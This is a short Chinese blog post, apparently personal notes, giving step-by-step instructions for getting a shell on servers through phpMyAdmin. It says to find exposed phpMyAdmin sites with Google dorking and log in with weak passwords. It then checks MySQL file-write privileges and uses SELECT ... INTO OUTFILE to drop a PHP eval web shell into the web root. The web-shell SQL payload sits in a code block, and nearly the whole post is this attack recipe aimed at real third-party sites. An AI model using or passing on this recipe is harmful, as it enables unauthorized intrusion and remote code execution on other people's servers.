<h2 id="通过phpmyadmin来getshell"><a href="#通过phpmyadmin来getshell" class="headerlink" title="通过phpmyadmin来getshell"></a>通过phpmyadmin来getshell</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1. 首先通过google hacking找到phpmyadmin的网站</span><br><span class="line"></span><br><span class="line">2. 弱口令登录，SHOW GLOBAL VARIABLES LIKE &apos;%secure_file_priv%&apos;;判断我们有没有权限去写木马文件</span><br><span class="line"></span><br><span class="line">3. 执行SQL语句，查看数据库所在位置：select @@basedir;</span><br><span class="line"></span><br><span class="line">4. 猜测根目录写入木马文件：`select  &apos;&lt;?php eval($_POST[_]);?&gt;&apos; into outfile &apos;G;//shell.php&apos;`：注意：写木马的路径，一般是`/var/www/html`</span><br></pre></td></tr></table></figure>
 
                <!-- Meta -->
                <div class="post-meta">
                    <hr>
                    <br>
                    <div class="post-tags">
                        
                            

<a href="/tags/mysql-笔记/">#mysql,笔记</a>


                        
                    </div>
                    <div class="post-date">
                        2018 年 12 月 22 日
                    </div>
                </div>
            </div>

            <!-- Comments -->
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <!-- Disqus Comments -->


            </div>
        </div>
    </div>
</article>
</section>

    <!-- Scripts -->
    <!-- jQuery -->
<script src="//cdn.bootcss.com/jquery/2.2.1/jquery.min.js"></script>
<!-- Bootstrap -->
<script src="//cdn.bootcss.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<script type="text/javascript">
	console.log('Hexo-theme-hollow designed by zchen9 🙋 © 2015-' + (new Date()).getFullYear());
</script>

    <!-- Google Analytics -->
    

</body>

</html>